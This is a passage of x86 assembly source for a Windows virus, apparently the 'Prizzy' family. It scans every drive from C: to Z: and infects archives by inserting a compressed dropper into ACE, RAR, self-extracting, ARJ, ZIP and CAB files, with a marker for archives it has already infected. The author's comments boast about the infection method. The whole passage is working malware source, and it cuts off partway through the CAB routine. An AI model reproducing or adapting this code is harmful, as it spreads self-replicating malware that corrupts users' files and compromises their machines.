		;and many namez, find "HyperTable" struct  for	more info.
		;If you want to know more  about this method,  open "Hyper
		;Infection" article in 29A #4, or download one from my web
		;
		;Note:	* This is version for API, for IDT orientation use
		;	  code from "Win95.Prizzy", thanks.
		;
init_search:

		pusha
		call	get_base_ebp		;where we're into ebp

		mov	ebx,[ebp+search_table]	;position in HyperTable
		cmp	byte ptr [ebp+search_start],00h
		jnz	__continue
		mov	byte ptr [ebp+search_start],01h
		call	get_disks		;get drive parameters
		lea	eax,[ebp+time]
		push	eax
		call	[ebp+ddGetSystemTime]	;get actual time

		mov	eax,search_mem_size	;size of mem for searching
		call	malloc
		jz	init_search_error	;were we sucessful ?
		mov	[ebp+search_address],eax

		mov	eax,005C3A43h		;'C:\\0'
		mov	dword ptr [ebp+search_filename],eax
    __searching:
		mov	byte ptr [ebp+search_plunge],00h
		jmp	search_all_dirs
    __searching_end:
		cmp	byte ptr [ebp+search_filename],'Z'
		jz	init_search_done
		inc	byte ptr [ebp+search_filename]
		mov	word ptr [ebp+search_filename+2],005Ch

		; what disk is it ? fixed ? cd-rom ? ram-disk ? etc. ?
		mov	cl,'A'
		sub	cl,[ebp+search_filename]
		neg	cl
		mov	eax,00000001h
		shl	eax,cl			;convert to BCD
		test	[ebp+gdt_flags],eax
		jnz	__searching		;may I "use" this disk ?
		jmp	__searching_end 	;uaaaaah, i'm crazy... :)

init_search_exit:
		mov	ecx,dword ptr [ebp+search_address]
		call	mdealloc		;deallocate memory

init_search_error:
		popa				;restore all regz
		ret

init_search_done:				;all disks infected?
		call	hookHyperInfection_Done ;remove timer
		jmp	init_search_exit

search_all_dirs:
		lea	ebx,[ebp+HyperTable]
search_all_dirs_continue:
		call	__add_filename		;add filename or extension

		call	__calc_in_mem		;offs dta in mem to esi

		lea	edx,[ebp+search_filename]
		call	__MyFindFirst
		mov	[esi-size search_handle],eax	;save handle
		jc	__find_dir		;error ?

	__repeat:
		call	__clean 		;delete extension
		push	esi
		lea	esi,[esi].dta_filename	;and add file name
		@copysz 			;copy with zero char
		pop	esi			;restore esi=dta in memory
		lea	eax,[ebp+search_filename]
		mov	[ebp+filename_ptr],eax

	__final_SoftICE_1:
		nop
		nop
;		 int	 4			 ;final SoftICE breakpoint

		mov	eax,[ebx-00000004h]	;input value
		push	dword ptr [ebx-00000008h]
		add	[esp],ebp		;this was ghastly bug !
		call	[esp]			;call function
		pop	eax

		push	word ptr [ebp+time.wSecond]
		lea	eax,[ebp+time]		;give time other appz
		push	eax
		call	[ebp+ddGetSystemTime]
		pop	cx
		mov	[ebp+search_table],ebx	;position in HyperTable
		cmp	cx,[ebp+time.wSecond]	;out of time ?
		jnz	init_search_error

	__continue:
		call	__calc_in_mem		;esi=dta in memory
		mov	eax,[esi-size search_handle]	;handle of FindFirstFile
		call	__MyFindNext
		jnc	__repeat
		call	__MyFindClose

     __find_dir:
		call	__clean 		;remove file name/extension
		cmp	byte ptr [ebx],0FFh	;last file name ?
		jnz	search_all_dirs_continue

     __find_dir_continue:
		mov	[edi],002A2E2Ah 	;add '*.*',0

		call	__calc_in_mem
		lea	edx,[ebp+search_filename]

		call	__MyFindFirst		;search directory "only"
		mov	[esi-size search_handle],eax
		jc	__search_exit

 __find_in_dir:
		test	[esi].dta_fileattr,10h	;is it directory ?
		jz	__find_next
		cmp	[esi].dta_filename,'.'	;it can't be directory
		jz	__find_next

		inc	byte ptr [ebp+search_plunge]

		call	__get_last_char 	;edi=last char of filename
		lea	esi,[esi].dta_filename	;esi=filename

		call	__clean 		;remove extension

		@copysz 			;copy directory name and
		mov	word ptr [edi-1],005Ch	;set '\' at the end

		jmp	search_all_dirs 	;search in new directory

    __find_next:
		call	__calc_in_mem
		mov	eax,[esi-size search_handle]
		call	__MyFindNext
		jnc	__find_in_dir

  __search_exit:
		call	__clean 		;remove file name and '\'
		mov	byte ptr [edi-1],00h	;it's out of directory
		dec	byte ptr [ebp+search_plunge]
		cmp	byte ptr [ebp+search_filename+2],00h
		jz	__searching_end
		jmp	__find_next

  __calc_in_mem:				;get pointer to dta in memory
		movzx	esi,byte ptr [ebp+search_plunge]
		imul	esi,size dta+size search_handle
		add	esi,[ebp+search_address]
		add	esi,size search_handle
		ret

 __add_filename:				;add f.n. or ext by HyperTable
		call	__get_last_char
		cmp	byte ptr [ebx],00h	;only extension ?
		jnz	__af_fullcopy
		mov	eax,[ebx+1]		;load extension
		mov	byte ptr [edi],2Ah	;'*'
		mov	[edi+1],eax		;and extension
		mov	byte ptr [edi+5],00h	;zero byte
		add	ebx,HyperTable_OneSize
		cmp	byte ptr [ebx - \
			HyperTable_HalfSize],00h;search this extension ?
		jz	__aff_finish
		pop	eax
		jmp	__find_dir
	__aff_finish:
		ret

	__af_fullcopy:
		inc	ebx
		mov	al,byte ptr [ebx]	;load filename's char
		mov	[edi],al
		inc	edi
		or	al,al			;end of filename ?
		jnz	__af_fullcopy
		add	ebx,HyperTable_HalfSize+1;+1 means zero byte
		cmp	byte ptr [ebx - \
			HyperTable_HalfSize],00h;search this filename ?
		jz	__aff_finish
		pop	eax
		jmp	__find_dir

__get_last_char:				;edi=last char+1 in filename
		lea	edi,[ebp+search_filename]
		mov	ecx,filename_size
		xor	al,al
		cld
		repnz	scasb
		dec	edi
		ret

	__clean:				;clean last item in filename
		lea	edx,[ebp+search_filename]
		call	__get_last_char
	    __2:mov	byte ptr [edi],0
		dec	edi
		cmp	byte ptr [edi],'\'
		jnz	__2
		inc	edi
		ret

;ÄÄÄ´ infection in ACE/RAR and ACE/RAR EXE-SFX archivez ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function scans input EXE	file whether it is not SFX
		;for RAR (Dos,W32) or for ACE (Dos,Win32 - German/English)
		;If yes, I will put compressed dropper in the end of file.
		;Why that ? See on "infect_ACE:" comment for more info.
		;
		__iSFX_fHandle	dd	00000000h	;file's handle
		__iSFX_fMemory	dd	00000000h	;file's headers
		__iSFX_nCompare dd	00000000h	;comparing places
		;
infect_ACE_RAR:

		; open input file
		mov	edx,[ebp+filename_ptr]
		call	__MyOpenFile
		jc	__iSFX_finish
		mov	[ebp+__iSFX_fHandle],eax

		; allocate memory for comparing
		mov	eax,10000h
		call	malloc
		mov	[ebp+__iSFX_fMemory],eax

		; we must search certain bytes on certain file position
		mov	[ebp+__iSFX_nCompare],7 	;six! comparing
	__iSFX_search_1:
		dec	[ebp+__iSFX_nCompare]
		jz	__iSFX_sEnd
		lea	ebx,[ebp+Archive_MagicWhere]
	__iSFX_magic_okay:
		mov	eax,[ebp+__iSFX_nCompare]
		imul	eax,00000004h
		add	ebx,eax
		movzx	ecx,word ptr [ebx-0002h]	;ecx=bytes to read
		movzx	esi,word ptr [ebx-0004h]	;esi=file pos

		; now, i will read datas
		mov	edx,[ebp+__iSFX_fMemory]	;allocated place
		mov	ebx,[ebp+__iSFX_fHandle]
		call	__MyReadFile			;i can't check error!

		; prepare to scan
		mov	edi,[ebp+__iSFX_fMemory]
		mov	ebx,edi
		add	ebx,ecx 		;end of memory buffer
	__iSFX_search_2:
		cmp	edi,ebx
		ja	__iSFX_search_1

		; search archive's signatures
		lea	esi,[ebp+RAR_Magic]		;no, esi=RAR_Magic
		mov	ecx,RAR_Magic_Length		;and its size
		cmp	[ebp+__iSFX_nCompare],00000004h
		jae	__iSFX_s2_continue		;is it really RAR ?
		lea	esi,[ebp+ACE_Magic]		;esi=ACE_Magic
		mov	ecx,ACE_Magic_Length		;and its size
	__iSFX_s2_continue:
		cld
		rep	cmpsb			;compare magics
		jnz	__iSFX_search_2 	;shit, we must search on other place

		; position on header's start
		sub	edi,RAR_Magic_Length
		cmp	[ebp+__iSFX_nCompare],00000004h
		jae	__iSFX_h_read
		sub	edi,2*ACE_Magic_Length-RAR_Magic_Length
	__iSFX_h_read:

		; check multivolume flag
		cmp	[ebp+__iSFX_nCompare],00000004h
		jae	__iSFX_mf_rar
		test	word ptr [edi+ACEhHeadFlags-ACE_h_struct],2048
		jmp	__iSFX_mf_finish
	__iSFX_mf_rar:
		test	word ptr [edi+RARFileFlags-RARSignature],0001h
	__iSFX_mf_finish:
		jnz	__iSFX_sEnd

		; call "child" functions, set certain input parameters
		mov	eax,[ebp+__iSFX_fHandle]
		mov	[ebp+__iACR_fHandle],eax	;modify handle

		mov	[ebp+__iACR_Type],__iACR_tRAR	;yeah, RAR archive
		cmp	[ebp+__iSFX_nCompare],00000004h
		jae	__iSFX_cc_finish
		mov	[ebp+__iACR_Type],__iACR_tACE	;yeah, ACE archive
	__iSFX_cc_finish:
		mov	ebx,[ebp+__iSFX_fHandle]	;check whether SFX
		call	__get_archive_infected		;archive has been
		jc	__iSFX_fClose			;infected

		call	__iACR_child_function		;call main function
		jmp	__iSFX_finish			;to infect ACE or RAR

	__iSFX_sEnd:
		call	__iSFX_fClose
		stc
		ret

	__iSFX_fClose:
		mov	ebx,[ebp+__iSFX_fHandle]
		call	__MyCloseFile
	__iSFX_finish:
		clc
		ret

;ÄÄÄ´ infection in ACE, RAR archivez ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function infects ACE and RAR archivez. Unfortunately
		;I can't my dropper place inside archive 'cause if archive
		;is solid type resulting archive won't okay. Yes, this was
		;shock for me. But if archive isn't solid all will be okay
		;althrough this method is not support here. So, my dropper
		;is compressed but in the end of file.
		;
		;  input:    filename_ptr ... pointer to an ARJ's filename
		;	     NewARJ struc ... has been filled? I dont know!
		;
		;  output:   nothing
		;
		__iACR_fHandle	dd	00000000h	;archive's handle
		__iACR_dHandle	dd	00000000h	;dropper's handle
		__iACR_dMemory	dd	00000000h	;dropper's body
		;
		__iACR_Type	dd	00000000h	;ACE or RAR ?
		__iACR_tACE	equ	00h		;ACE signature
		__iACR_tRAR	equ	01h		;RAR signature
		;
infect_ACE:	mov	[ebp+__iACR_Type],__iACR_tACE	;yeah, ACE archive
		jmp	infect_ACR
infect_RAR:	mov	[ebp+__iACR_Type],__iACR_tRAR	;yeah, RAR archive

		; here, common functions is starting...
infect_ACR:

		; check whether dropper exists
		mov	eax,[ebp+__iACR_Type]	;get archive type
		imul	eax,size AProgram
		cmp	[ebp+eax+NewACE.dropper],00000000h
		jz	__iACR_finish		;does dropper exists ?

		; open archive file
		mov	edx,[ebp+filename_ptr]
		call	__MyOpenFile
		jc	__iACR_finish
		mov	[ebp+__iACR_fHandle],eax

		; check whether archive has been infected
		mov	ebx,[ebp+__iACR_fHandle]
		call	__get_archive_infected
		jc	__iACR_fClose

		; read archive header
	    cmp     dword ptr [ebp+offset __iACR_Type],__iACR_tACE
	    jnz     __iACR_rar_1
		lea	edx,[ebp+ACE_h_struct]	;destination place
		mov	ecx,ACENeededBytes
		jmp	__iACR_end_1
	__iACR_rar_1:
		lea	edx,[ebp+RARSignature]	;destination place
		mov	ecx,RARSignature_Length + \
			    RARNeededBytes	;number of bytes to read

	__iACR_end_1:
		xor	esi,esi
		mov	ebx,[ebp+__iACR_fHandle]
		call	__MyReadFile
		jc	__iACR_fClose

		; check archive's header
	    cmp     dword ptr [ebp+offset __iACR_Type],__iACR_tACE
	    jnz     __iACR_rar_2
		cmp	dword ptr [ebp+ACEhSignature],'CA**'
		jnz	__iACR_fClose		;the 1st part of sign
		cmp	word ptr [ebp+ACEhSignature+00000004h],'*E'
		jnz	__iACR_fClose		;the 2nd part
		test	word ptr [ebp+ACEhHeadFlags],2048
		jnz	__iACR_fClose		;multivolume flag ?
		jmp	__iACR_end_2
	__iACR_rar_2:
		cmp	dword ptr [ebp+RARSignature],'!raR'
		jnz	__iACR_fClose
		cmp	word ptr [ebp+RARSignature+00000004h],071Ah
		jnz	__iACR_fClose
		test	word ptr [ebp+RARFileFlags],0001h
		jnz	__iACR_fClose		;multivolume flag ?
	__iACR_end_2:

		; open dropper file
	__iACR_child_function:
		mov	edx,[ebp+__iACR_Type]	;get archive type
		imul	edx,size AProgram
		mov	edx,[ebp+edx+NewACE.dropper]
		or	edx,edx 		;once again test:
		jz	__iACR_finish		;does dropper exists ?
		call	__MyOpenFile
		jc	__iACR_fClose
		mov	[ebp+__iACR_dHandle],eax

		; get dropper's file size
		mov	ebx,[ebp+__iACR_dHandle]
		call	__MyGetFileSize
		mov	ecx,eax

		; allocate memory for dropper's file body
		call	malloc
		mov	[ebp+__iACR_dMemory],eax

		; read whole dropper's body
		mov	edx,[ebp+__iACR_dMemory];destination buffer
		xor	esi,esi 		;file position
		mov	ebx,[ebp+__iACR_dHandle];dropper's handle
		call	__MyReadFile
		jc	__iACR_dClose

		; get archive file size
		mov	ebx,[ebp+__iACR_fHandle]
		call	__MyGetFileSize
		mov	esi,eax

		; "update" archive file by my dropper
	    cmp     dword ptr [ebp+offset __iACR_Type],__iACR_tACE
	    jnz     __iACR_rar_3
		movzx	eax,word ptr [edx+ACEhHeadSize-ACE_h_struct]
		add	eax,00000004h
		jmp	__iACR_end_3
	__iACR_rar_3:
		movzx	eax,word ptr [edx+RARHeaderSize-RARSignature]
		add	eax,RARSignature_Length

	__iACR_end_3:
		add	edx,eax 		;header take away
		sub	ecx,eax 		;without main header, please
		mov	ebx,[ebp+__iACR_fHandle]
		call	__MyWriteFile		;write my dropper, uaaah :)

		; archive has been infected
		mov	ebx,[ebp+__iACR_fHandle]
		call	__set_archive_infected

	__iACR_dClose:
		mov	ebx,[ebp+__iACR_dHandle]
		call	__MyCloseFile
	__iACR_dealloc:
		mov	eax,[ebp+__iACR_dMemory]
		call	mdealloc
	__iACR_fClose:
		mov	ebx,[ebp+__iACR_fHandle]
		call	__MyCloseFile

	__iACR_finish:
		ret

;ÄÄÄ´ infection in ARJ archivez ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function infect ARJ archivez by my prepared dropper.
		;Dropper is compressed by ARJ (four method without store).
		;
		;  input:    filename_ptr ... pointer to an ARJ's filename
		;	     NewARJ struc ... 's been filled? I dont know!
		;
		;  output:   nothing
		;
		__iARJ_fHandle	dd	00000000h	;archive's handle
		__iARJ_fFiles	dd	00000000h	;number of files
		__iARJ_dHandle	dd	00000000h	;dropper's handle
		__iARJ_dMemory	dd	00000000h	;dropper's file body
		;
infect_ARJ:

		xor	eax,eax
		mov	[ebp+__iARJ_fFiles],eax

		; check whether dropper exists
		cmp	[ebp+NewARJ.dropper],00000000h
		jz	__iARJ_finish

		; open archive
		mov	edx,[ebp+filename_ptr]
		call	__MyOpenFile
		jc	__iARJ_finish
		mov	[ebp+__iARJ_fHandle],eax

		; check whether archive has been infected
		mov	ebx,[ebp+__iARJ_fHandle]
		call	__get_archive_infected
		jc	__iARJ_fClose

		; read archive header
		lea	edx,[ebp+ARJ_struct]	;destination place
		mov	ecx,ARJNeededBytes	;needed bytes to read
		xor	esi,esi 		;file position
		mov	ebx,[ebp+__iARJ_fHandle];file handle
		call	__MyReadFile
		jc	__iARJ_fClose

		; check archive's signatures
		cmp	word ptr [ebp+ARJHeaderId],0EA60h
		jnz	__iARJ_fClose
		test	byte ptr [ebp+ARJFlags],04h
		jnz	__iARJ_fClose		;multivolume flags, I guess

		; get number of files
		lea	edx,[ebp+ARJ_struct]	;destination place
		movzx	esi,word ptr [ebp+ARJHeaderSize] ;file position
		add	esi,0000000Ah		;add up file-off
		mov	ecx,ARJNeededBytes	;needed bytes to read
		mov	ebx,[ebp+__iARJ_fHandle];file handle
		push	esi			;first entry
	__iARJ_search_1:
		call	__iARJ_next_file
		jc	__iARJ_sEnd_1		;it isn't 100% error !

		; next file has been found
		inc	[ebp+__iARJ_fFiles]	;increase files counter :)
		jmp	__iARJ_search_1

	__iARJ_sEnd_1:
		pop	esi			;first entry
		cmp	ecx,00000004h		;end of file ?
		jnz	__iARJ_fClose
		cmp	word ptr [ebp+ARJHeaderSize],0000h
		jnz	__iARJ_fClose		;double security :)

		; generate my new archive file position
		mov	eax,[ebp+__iARJ_fFiles] ;number of files
		inc	eax
		call	ppe_get_rnd_range
		xchg	eax,ecx 		;new ECX: disable files

		; read file headers which aren't neccessary for me
		jecxz	__iARJ_sEnd_2
	__iARJ_search_2:
		push	ecx
		call	__iARJ_next_file	;disable folders
		pop	ecx
		loop	__iARJ_search_2
	__iARJ_sEnd_2:

		; note: ESI = my new place :)
		mov	edi,esi

		; open dropper file
		mov	edx,[ebp+NewARJ.dropper]
		call	__MyOpenFile
		jc	__iARJ_fClose
		mov	[ebp+__iARJ_dHandle],eax

		; get dropper's file size
		mov	ebx,[ebp+__iARJ_dHandle]
		call	__MyGetFileSize
		mov	edx,eax

		; get archive's file size and subtract my new place
		mov	ebx,[ebp+__iARJ_fHandle]
		call	__MyGetFileSize
		sub	eax,esi 		;esi = my new place
		push	eax			;archive's needed size
		add	eax,edx
		push	edx			;dropper's file size

		; allocate memory for dropper's file body
		call	malloc
		mov	[ebp+__iARJ_dMemory],eax

		; read whole dropper's file body
		mov	edx,[ebp+__iARJ_dMemory];destination place
		pop	ecx			;number of bytes to read
		xor	esi,esi 		;file position
		mov	ebx,[ebp+__iARJ_dHandle];file handle
		call	__MyReadFile
		pop	ebx			;archive's needed file size
		jc	__iARJ_dClose

		; read "almost" whole archive file behind my dropper
		add	edx,ecx 		;new destination place
		sub	edx,00000004h		;delete ending two flags
		mov	esi,edi 		;edi = my new place
		mov	ecx,ebx 		;number of bytes to read
		mov	ebx,[ebp+__iARJ_fHandle]
		call	__MyReadFile
		jc	__iARJ_dClose

		; "update" archive file :)
		add	ecx,edx 		;end of readed datas
		sub	ecx,[ebp+__iARJ_dMemory]
		mov	edx,[ebp+__iARJ_dMemory]
		movzx	eax,word ptr [edx+00000002h]
		add	eax,0000000Ah
		add	edx,eax
		sub	ecx,eax
		mov	ebx,[ebp+__iARJ_fHandle]
		call	__MyWriteFile

		; archive has been infected
		mov	ebx,[ebp+__iARJ_fHandle]
		call	__set_archive_infected

	__iARJ_dClose:
		mov	ebx,[ebp+__iARJ_dHandle]
		call	__MyCloseFile
	__iARJ_dealloc:
		mov	eax,[ebp+__iARJ_dMemory]
		call	mdealloc
	__iARJ_fClose:
		mov	ebx,[ebp+__iARJ_fHandle]
		call	__MyCloseFile

	__iARJ_finish:
		ret

		;---------------------------------------------------------
		;Set file position on the next entry
		;
		;   input:   EDX ... destination buffer
		;	     EBX ... file handle
		;	     ESI ... some header's place (file position)
		;
		;   output:  ESI ... next header position (if exists :)
		;	     Cflags
		;
	__iARJ_next_file:
		mov	ecx,ARJNeededBytes	;number of bytes to read
		call	__MyReadFile
		jc	__iARJ_nf_check 	;it isn't 100% error !

		; set file position on the next file
		movzx	eax,word ptr [ebp+ARJHeaderSize]
		add	eax,[ebp+ARJCompressedSize]
		add	eax,0000000Ah		;add up file-off
		add	esi,eax
	__iARJ_nf_check:
		ret

;ÄÄÄ´ infection in ZIP archivez ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function adds to ZIP archive  certain EXE file which
		;has been infected and compressed by PKZIP achiver program
		;Compressing method  has been selected randomly  from four
		;possibilities (without "store" method, of course).
		;
		;  input:    filename_ptr ... pointer to a ZIP's filename
		;	     NewZIP struc ... has been filled? I dont know!
		;
		;  output:   nothing
		;
		__iZIP_fHandle	dd	00000000h	;archive's file handle
		__iZIP_fHeaders dd	00000000h	;archive's headers
		__iZIP_fNewDPos dd	00000000h	;a. pos for d. body
		__iZIP_fMemory	dd	00000000h	;archive's file body

		__iZIP_dHandle	dd	00000000h	;dropper's file handle
		__iZIP_dFSize	dd	00000000h	;dropper's file size
		__iZIP_dMemory	dd	00000000h	;dropper's file body
		__iZIP_dHSize	dd	00000000h	;dropper's header s.
		;
infect_ZIP:

		; check whether "NewZIP" struc has been filled
		cmp	[ebp+NewZIP.dropper],00000000h
		jz	__iZIP_finish

		; open archive file
		mov	edx,[ebp+filename_ptr]
		call	__MyOpenFile
		jc	__iZIP_finish
		mov	[ebp+__iZIP_fHandle],eax

		; check whether archive has been infected
		mov	ebx,[ebp+__iZIP_fHandle]
		call	__get_archive_infected
		jc	__iZIP_fClose

		; get archive file size
		mov	ebx,[ebp+__iZIP_fHandle]
		call	__MyGetFileSize
		mov	esi,eax

		; read its 3rd table
		mov	ecx,ZIPEHeaderSize	;number of bytes to read
		lea	edx,[ebp+ZIPReadBuffer] ;destination buffer
		sub	esi,ZIPEHeaderSize	;file pos
		mov	ebx,[ebp+__iZIP_fHandle];file handle
		call	__MyReadFile
		jc	__iZIP_fClose

		; check that table
		cmp	word ptr [ebp+ZIPEHeaderId],'KP'
		jnz	__iZIP_fClose
		cmp	word ptr [ebp+ZIPSignature],0605h
		jnz	__iZIP_fClose
		cmp	dword ptr [ebp+ZIPNoDisk],00000000h
		jnz	__iZIP_fClose

		; open dropper file
		mov	edx,[ebp+NewZIP.dropper]
		call	__MyOpenFile
		jc	__iZIP_fClose
		mov	[ebp+__iZIP_dHandle],eax

		; get its file size
		mov	ebx,[ebp+__iZIP_dHandle]
		call	__MyGetFileSize
		mov	[ebp+__iZIP_dFSize],eax

		; allocate memory
		call	malloc
		mov	[ebp+__iZIP_dMemory],eax

		; read its file body
		mov	ecx,[ebp+__iZIP_dFSize] ;number of bytes to read
		mov	edx,[ebp+__iZIP_dMemory];destination buffer
		xor	esi,esi 		;file pos
		mov	ebx,[ebp+__iZIP_dHandle]
		call	__MyReadFile

		; get dropper's start of header and its length
		mov	esi,[ebp+__iZIP_dMemory]
		add	esi,[ebp+__iZIP_dFSize]
		mov	ecx,[esi-0000000Ah]	;length of 2nd header
		sub	esi,ZIPEHeaderSize	;esi = header
		sub	esi,ecx
		mov	[ebp+__iZIP_dHSize],ecx
		push	esi

		; allocate memory for archive header + new header
		mov	eax,[ebp+ZIPSizeDir]
		add	eax,ecx
		call	malloc
		mov	[ebp+__iZIP_fHeaders],eax

		; read them to the buffer
		mov	ecx,[ebp+ZIPSizeDir]	;number of bytes to read
		add	ecx,ZIPEHeaderSize	;include 3rd table as well
		mov	edx,eax 		;destination place
		mov	esi,[ebp+ZIPOffsetDir]	;file pos
		mov	ebx,[ebp+__iZIP_fHandle]
		call	__MyReadFile
		jc	__iZIP_dealloc

		; get actual files in archive
		movzx	ecx,word ptr [ebp+ZIPEntrysDir]

		; and select my new position :)
		lea	eax,[ecx+00000001h]
		call	ppe_get_rnd_range
		sub	ecx,eax
		push	ecx
		xchg	eax,ecx

		; get my future offset if I'll be in the end
		mov	eax,[ebp+ZIPOffsetDir]
		not	eax
		mov	[ebp+__iZIP_fNewDPos],eax

		; seek on my new position in the headers
		mov	esi,[ebp+__iZIP_fHeaders]
	__iZIP_search_1:
		jecxz	__iZIP_sEnd_1
		add	esi,ZIPRScanSize1	;seek on FileNameSize
		movzx	eax,word ptr [esi]	; + filename length
		add	ax,word ptr [esi+2]	; + extra field
		add	esi,eax
		add	esi,ZIPRScanSize2	;seek on text file folder
		loop	__iZIP_search_1
	__iZIP_sEnd_1:

		pop	ecx			;how many folders change ?
		push	esi			;my new place for header
	__iZIP_search_2:
		jecxz	__iZIP_sEnd_2
		add	esi,ZIPRScanSize1 + \
			    ZIPRScanSize3
		test	dword ptr [ebp+__iZIP_fNewDPos],0F0000000h
		jz	__iZIP_search_2_next
		mov	eax,[esi]
		mov	[ebp+__iZIP_fNewDPos],eax
	__iZIP_search_2_next:
		mov	eax,[ebp+__iZIP_dFSize] ;== fbody+2nd+3rd table
		sub	eax,ZIPEHeaderSize	;== - 3rd table
		sub	eax,[ebp+__iZIP_dHSize] ;== - dropper's header size
		add	[esi],eax
		add	esi,[esi-ZIPRScanSize3] ;add FileNameSize
		add	esi,00000004h
		loop	__iZIP_search_2
	__iZIP_sEnd_2:

		; get number of bytes to move
		mov	ecx,esi
		pop	esi			;my new place
		sub	ecx,esi 		;number of bytes to move
		add	ecx,ZIPEHeaderSize	;include last table as well
		mov	edi,esi 		;"almost" destination
		add	edi,[ebp+__iZIP_dHSize] ;dropper's header length
		push	esi
		call	__movsd_back
		pop	edi

		; copy my new table, it means: "update header", please :)
		mov	ecx,[ebp+__iZIP_dHSize]
		pop	esi			;start of dropper's header
		push	edi
		rep	movsb
		pop	edi

		; change this copied header
		add	edi,ZIPRScanSize1 + ZIPRScanSize3
		mov	eax,[ebp+__iZIP_fNewDPos]
		test	eax,0F0000000h		;only if it is last "section"
		jz	$+4
		not	eax
		mov	[ebp+__iZIP_fNewDPos],eax
		mov	[edi],eax		;start of data
		mov	ecx,eax

		; allocate memory for archive body
		mov	ebx,[ebp+__iZIP_fHandle]
		call	__MyGetFileSize
		sub	eax,ecx 		;sub start of data
		mov	edx,eax
		add	eax,[ebp+__iZIP_dFSize]
		sub	eax,[ebp+__iZIP_dHSize] ;dropper's header length
		sub	eax,ZIPEHeaderSize	;3rd tablee
		call	malloc
		mov	[ebp+__iZIP_fMemory],eax

		; read part of archive file to the memory
		mov	esi,ecx 		;file position
		mov	ecx,edx 		;number of bytes to read
		mov	edx,[ebp+__iZIP_dHSize] ;dropper's header length
		neg	edx			;this was fucking bug !
		add	edx,[ebp+__iZIP_dFSize]
		sub	edx,ZIPEHeaderSize	;i don't want 3rd table
		mov	edi,edx 		;dropper's compressed body
		add	edx,[ebp+__iZIP_fMemory];destination place
		mov	ebx,[ebp+__iZIP_fHandle]
		call	__MyReadFile
		jc	__iZIP_dealloc

		; copy my compressed dropper before reader data
		mov	edx,ecx
		mov	ecx,edi 		;dropper's compressed body s.
		mov	ebx,ecx
		mov	esi,[ebp+__iZIP_dMemory]
		mov	edi,[ebp+__iZIP_fMemory]
		rep	movsb			;"update" archive :)

		; copy my changed headers behind compressed datas
		add	edi,edx 		;in the end of file
		sub	edi,[edi-0000000Ah]	;length of the 2nd table
		sub	edi,ZIPEHeaderSize	; - 3rd table
		mov	esi,[ebp+__iZIP_fHeaders]
	__iZIP_replace:
		cmp	[esi],06054B50h 	;'PK',05,06 ? Last table ?
		jz	__iZIP_replace_finish
		lodsb
		stosb
		jmp	__iZIP_replace
	__iZIP_replace_finish:
		mov	ecx,ZIPEHeaderSize	;copy last table
		rep	movsb

		; change last table
		add	[edi-00000006h],ebx	;archive size + dropper body
		mov	ecx,[ebp+__iZIP_dHSize] ;dropper's header length
		add	[edi-0000000Ah],ecx	;change ZIPSizeDir
		inc	word ptr [edi-0000000Eh];increase ZIPEntryDisk
		inc	word ptr [edi-0000000Ch];increase ZIPEntryDir

		; "update" archive file body
		mov	edx,[ebp+__iZIP_fMemory]
		mov	ecx,edi
		sub	ecx,edx
		mov	esi,[ebp+__iZIP_fNewDPos]
		mov	ebx,[ebp+__iZIP_fHandle]
		call	__MyWriteFile

		; archive has been infected
		mov	ebx,[ebp+__iZIP_fHandle]
		call	__set_archive_infected

	__iZIP_dealloc:
		mov	eax,[ebp+__iZIP_fMemory]
		call	mdealloc
		mov	eax,[ebp+__iZIP_fHeaders]
		call	mdealloc
		mov	eax,[ebp+__iZIP_dMemory]
		call	mdealloc

		mov	ebx,[ebp+__iZIP_dHandle]
		call	__MyCloseFile

	__iZIP_fClose:
		mov	ebx,[ebp+__iZIP_fHandle]
		call	__MyCloseFile

	__iZIP_finish:
		ret

;ÄÄÄ´ infection in CAB archivez ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function infects Microsoft CAB archivez. The way	of
		;infection is the most difficult of all archivez here.Why?
		;Micro$hit CAB format is too stupid, I cannot compress	my
		;dropper because I don't know  any DLL which support this.
		;Although Windows has some Extrac32 and so on. If you want
		;to know more about CAB infection, download my tutorial on
		;web: http://prizzy.cjb.net (download section, of course).
		;
		;  input:    filename_ptr ... pointer to a CAB's file
		;	     NewCAB.dropper . name of EXE
		;
		__iCAB_fHandle	dd	00000000h	;archive's handle
		__iCAB_fFSize	dd	00000000h	;archive's file size
		__iCAB_fMemory	dd	00000000h	;archive's body+hdrs

		__iCAB_dHandle	dd	00000000h	;dropper's handle
		__iCAB_dFSize	dd	00000000h	;dropper's file size

		__iCAB_nChars	dd	00000000h	;chars of new name
		__iCAB_myFolder dd	00000000h	;my new folder
		;
infect_CAB:

		; check whether dropper exists
		cmp	[ebp+NewCAB.dropper],00000000h
		jz	__iCAB_finish

		; open archive file
		mov	edx,[ebp+filename_ptr]
		call	__MyOpenFile
		jc	__iCAB_finish
		mov	[ebp+__iCAB_fHandle],eax

		; check whether archive has been infected
		mov	ebx,[ebp+__iCAB_fHandle]
		call	__get_archive_infected
		jc	__iCAB_fClose

		; get archive file size
		mov	ebx,[ebp+__iCAB_fHandle]
		call	__MyGetFileSize
		mov	[ebp+__iCAB_fFSize],eax

		; open dropper file
		mov	edx,[ebp+NewCAB.dropper]
		call	__MyOpenFile
		jc	__iCAB_fClose
		mov	[ebp+__iCAB_dHandle],eax

		; get dropper's file size
		mov	ebx,[ebp+__iCAB_dHandle]
		call	__MyGetFileSize
		mov	[ebp+__iCAB_dFSize],eax

		; generate dropper's name
		lea	edi,[ebp+CABf_FileName]
		call	generate_name
		mov	[ebp+__iCAB_nChars],eax

		; allocate memory for whole file
		mov	eax,[ebp+__iCAB_fFSize]
		add	eax,[ebp+__iCAB_dFSize]
		add	eax,(CABe_Compr_data - CAB_directory_start) - (8+1+3)
		add	eax,[ebp+__iCAB_nChars]
		call	malloc
		mov	[ebp+__iCAB_fMemory],eax

		; read archive's headers to buffer
